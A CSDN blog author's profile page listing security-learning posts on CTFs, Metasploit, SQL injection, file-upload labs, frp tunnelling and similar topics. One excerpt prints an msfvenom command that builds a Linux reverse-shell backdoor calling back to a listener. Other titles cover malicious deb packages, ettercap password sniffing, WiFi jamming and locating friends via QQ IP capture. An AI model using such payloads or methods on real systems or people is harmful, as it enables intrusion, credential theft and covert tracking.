自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(28)
  • 收藏
  • 关注

转载 安装ssl后无法访问wordpress后台(解决)

安装ssl证书(白嫖万岁)安装之后打算回到后台打算尝试修改html代码再次尝试结果发现**后台404了

2023-02-07 16:26:43 808 1

原创 CTF工具收集(持续更新中)

CTF工具收集

2022-12-27 22:34:44 648

原创 python2配置cloacked-pixel

python2配置cloacked-pixel

2022-12-27 22:33:15 649

原创 # Dest0g3 520迎新赛(更新中)

Dest0g3 520迎新赛

2022-07-25 16:24:56 322

原创 python搭建客户端和服务端

python搭建客户端和服务端前言一、客户端搭建TCP客户端UPD客户端二、TCP服务端搭建三、尝试连接开启服务器开启服务端发送数据前言这里我们讲使用socket模块快速创建TCP,UDP服务器和客户端所在环境为:kali编写环境为kali中的:wing personal8一、客户端搭建TCP客户端我们在渗透的过程中,在企业内网中几乎没有网络工具或者编译器环境下,我们为了完成一些数据传输,发送垃圾数据,进行模糊测试就需要手动打击爱你一个tcp客户端以达到目标import sockett

2022-04-20 10:40:43 6422

原创 metasploit渗透

metasploit渗透前言一、Metasploit的模块构成二、攻击步骤三、漏洞利用目标机准备利用过程kali中开启msf进行靶机版本扫描选取漏洞模块配置漏洞模块进行攻击前言metasploit是一个开源工具,旨在方便渗透测测试,由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发一、Metasploit的模块构成Auxliaries(辅助模块)Exploit(漏洞利用模块)Payload(攻击载荷模块)Post(后期渗透模块)Encoders(编码工具模块)

2022-04-19 15:30:18 308

原创 nmap使用

nmap使用前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言此篇文章一、pandas是什么?示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。二、使用步骤1.引入库代码如下(示例):import numpy as npimport pandas as pdimport matplotlib.pyplot as pltimport seaborn as snsimport warningswarnings.filterwa

2022-04-18 23:24:41 3760 1

原创 CVE-2017-15715漏洞复现

vulhub通关记录前言Apache HTTPD 换行解析漏洞(CVE-2017-15715)通关步骤1.首先先开启环境2.漏洞复现ActiveMQ Deserialization Vulnerability (CVE-2015-5254)开启环境漏洞复现总结前言Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身Apache HTTPD 换行解析漏洞(CVE-

2022-03-28 12:03:02 3499

原创 upload-labs通关手册(10-20)加代码审计

upload-labs通关手册(10-20)前言二、通关手册pass-10(黑名单之双后缀名绕过)源码分析通关方法pass-11(白名单之%00截断绕过)源码分析通关手册pass-12()总结前言上篇博文记录了1-9关的通关手册,这篇文章我们记录一下10-20关的通关手册二、通关手册pass-10(黑名单之双后缀名绕过)源码如下$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(

2022-03-25 20:14:23 3932

原创 upload-labs通关手册(1-9关)加代码审计

upload-labs通关手册前言一、文件上传二、通关手册1.pass-012.pass-02(白名单之MIME绕过 )代码分析通关方法3.pass-03(黑名单之特殊解析后缀)代码分析通关方法4.pass-04(黑名单之.htaccess解析)代码分析通关方法5.pass-056.pass-06(黑名单之大小写绕过)代码分析通关方法总结前言upload是基于文件上传漏洞的一个靶场,在里面可以学习到文件上传的一些常见方法一、文件上传文件上传常见验证:后缀名,类型,文件头等后缀名:有白名单和

2022-03-23 16:36:31 4390

原创 SQL注入之盲注

SQL注入之盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数前言何为盲注?盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面一、盲注分类盲注分为三类:(1)基于布尔的SQL盲注(2)基于事

2022-03-20 12:43:56 6888

原创 MySQL注入之高权限注入

MySQL注入之高权限注入前言二、高权限注入1.什么是高权限注入2.跨库查询思路1.查看用户名2.获取所有的数据库名3.获取指定数据库名下的表名信息4.获取指定damicms下的表名admin下的列名信息4.获取damicms下的admin中的数据前言在数据库中有database,schema,table,user,行,列容易被混淆之间的关系他们之间的关系可以这样理解:database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指

2022-03-17 17:38:52 1178

原创 MySQL手工注入

MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据前言此次文章建立在MySQL数据库的基础上一、SQL注入的原理可控变量带入数据库查询,变量未存在过滤或者过滤不完整二,如何判断是否有注入点and 1=1页面正常and 1=2页面错误则表明有注入点同时也可以对参数随意赋值判断如果

2022-03-16 18:47:49 3431

原创 PHP反序列化字符逃逸

PHP序列化和反序列化前言一、PHP序列化(serialize)二、PHP反序列化(unserialize)三、魔幻函数四、PHP反序列化字符逃逸1.替换修改后导致序列化字符串变长2.替换之后导致序列化字符变短前言一、PHP序列化(serialize)序列化就是将变量或者对象转换为字符串的过程#序列化结果:o:1:"A":2:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";}//o 即object简写的对象//1 对象的字符数(这里对象是后面

2022-03-16 11:12:20 656

原创 内网流量流出1(frp端口转发)

内网流量流出1前言一、frp是什么二、准备前提三,操作步骤1.服务端配置(frp服务器端一般命名为frps,配置文件为frps.ini)2.客户端配置(客户端一般命名为frpc,配置文件为frpc.ini)在这里插入图片描述3.使用总结前言在进行渗透测试是经常会遇到目标在内网或者不能直接访问的情况,这时候就需要将我们的流量代理进目标内网一、frp是什么frp是一个可用于内网穿透的高性能的反向代理应用支持TCP,udp协议,并尝试点对点的穿透二、准备前提(1)一台位于公网上的服务器(作为服务端

2022-03-15 19:55:13 3629

原创 ettercap中间人攻击获取账号密码(易懂版)

APR欺骗 中间人攻击前言一、中间人攻击是什么?二.什么是APR欺骗三、实战-使用Ettercap工具实施中间人攻击1.设置环境2.对kali进行配置3.截取账号密码总结前言本文所涉及到的是MITM中间人攻击是一种间接入侵的攻击提示:以下是本篇文章正文内容,下面案例可供参考一、中间人攻击是什么?是一种间接入侵的攻击,通过手段将入侵者控制的一台计算机,放置在网络连接中的两台通信计算机之间常见的攻击手段:1.攻击者只要将网卡设置为混杂混式,伪装成代理服务器监听的特定流量就可实现攻击,因为很多

2022-02-28 19:48:21 3529

原创 基于java环境漏洞利用

基于java环境的漏洞利用获取shell前言二、操作步骤1.执行监听设置参数2.运行木马构建session总结前言一般基于Java的软件开发的电脑上,做财务,大数据,税控软件,收银,OA软件上都会有Java环境的搭建和配置可以利用到这个漏洞二、操作步骤1.执行监听设置参数#开启msfmsfconsole#设置参数use exploit/multi/browser/java_jre17_driver_manage #选取所用的模块show payloads #查看Java模块中可以使用的

2022-02-27 18:56:24 2664

原创 制作恶意deb软件包linux系统触发后门

文章目录前言一、kali二、操作步骤1.下载一个正常的软件包2.将软件包转移到root目录下3.将安装包解压到root目录中解压为free(文件名)4.制作后门放入free文件中三.总结前言通过kali系统中的msf在软件包中植入后门制作deb恶意软件包对linux系统进行shell获取提示:以下是本篇文章正文内容,下面案例可供参考一、kali示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户

2022-02-27 00:35:26 2068

原创 制作linux恶意软件获取shell加实战

一.使用msf制作linux后门二. 实战,给软件加后门制作linux后门1.使用msfvenom生成linux可执行文件msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.124.3 LPORT=4444 -b '\x00' -i 10 -f elf -o /var/www/html/xueguo-a x64 ...

2022-02-25 21:28:18 1134

原创 msf获取靶机shell进行远控

思路:msf制作exe木马文件靶机通过点击开启后门原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作前提:知道主机IP(命令行输入ifconfig)(1)msf制作木马输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马命令行中参数意义:然后开启apache服务:(2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...

2022-01-25 12:17:15 4006

原创 DVWA搭建遇见问题

DVWA第一次搭建遇到好多问题上网查也好多都零零星星或和自己的问题有差异所以整理一篇常见问题1.数据库无法连接打开phpstudy记住端口号打开数据库记住数据库名和密码打开phpstudy安装目录下的DVWA的config使用记事本打开config.inc.php查看用户名,密码,端口号是否和phpstudy配置相同(要注意端口号,本人就没有注意以至于一直没有搭建完成)之后重启mysql重新访问127.0.0.1/DVWA即可2.红字问题...

2022-01-06 12:00:00 2025

原创 DVWA搭建

一、前提条件:1.phpstudy官网:https://www.xp.cn2.DVWA官网:DVWA - Damn Vulnerable Web Application二、搭建过程:2.1 phpstudy的搭建开启Apache2.4.39和MySQL5.7.26俩个服务浏览器访问自己的ip地址(一般为127.0.0.1),出现下图,则phpstudy搭建完成2.2 MySQL环境配置(若自身电脑并未安装的话在进行安装)检查是否安装:开始->运行-.

2022-01-06 00:44:28 1007 2

原创 Esp8266板制作WiFi干扰器

Esp8266在我看来是一个很有趣值得深入研究的芯片,可以运用在多个方面其中我认为最有趣的就是做一个WiFi-killer制作干扰器(1)首先你要先准备一块esp8266板某宝上有买的渠道(2)其次你需要烧录软件链接:https://pan.baidu.com/s/1tZTAWKidfEgCrm3O7M-LaQ提取码:7ssi还有程序:链接:https://pan.baidu.com/s/1yxmwnev-syQTHItttFzVIg提取码:7mes差点...

2021-12-13 15:19:47 4938

原创 不怕舔狗有耐心,就怕卷狗有文化(bugku社工-进阶收集)

所谓爱情是双向奔赴的,但总有一些是单向输出的而这时就得来一句不怕舔狗有耐心,就怕舔狗有文化!在bugku这道题上上让我是感受的淋漓尽致打开映入眼帘的是一个图片可惜孩子地理没学好也不认识是什么地方,这时就用上了万能的度娘了经过查找发现这是著名的大雁塔然后我仔细欣赏了图片.......(真美但没用了)之后我就开始看这俩人的聊天然后我就默默打开了西安的地铁图发现大雁塔本身就是一个站然后他是第七站并且中间有过一次转站的就只有韦曲南了再根据这...

2021-12-07 22:55:06 371

原创 攻防世界MISC进阶区wireshark

前言:则是一道流量分析题使用到Wireshark等一系列工具wireshark:https://www.wireshark.org/hex-editorFree Hex Editor: Fastest Binary File Editing Software. Freeware. Windows (hhdsoftware.com)wp:1.打开wireshark下载附件打开导出HTTP2.一般信息大多是藏在url,html,图片当中的对http进行追踪在第一条..

2021-12-02 08:48:20 1359

原创 一秒获取朋友位置(火绒抓取ip)

火绒安全软件是一个很好的安全软件(可以在官网进行下载)其中的火绒剑也是一个非常好用的工具接下来我们介绍一下如何使用火绒剑这个工具进行qq抓取ip1.首先打开任务管理器(快捷键ctrl+shift+esc)在名称一行栏中右键找到PID点击选中(PID值对于整个获取很重要)2.找到QQ对应一行3.在任务管理器中记住进程PID的值4.打开火绒剑点开系统-过滤-进程过滤5.在进程中添加方法选择进程id,填写PID的值,操作选择”包含“6.路径...

2021-11-25 01:33:28 15195 15

原创 解决vm安装过程显示无人参与应答文件包含的产品密钥无效

1. 将右下角软盘断开连接;(原本为绿点)右键选择断开连接(变为灰色表示已经断开连接)2.重启vm即可;

2021-11-20 08:30:00 6525 4

原创 vmware蓝屏问题

解决vm蓝屏问题

2021-11-19 20:18:54 390

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除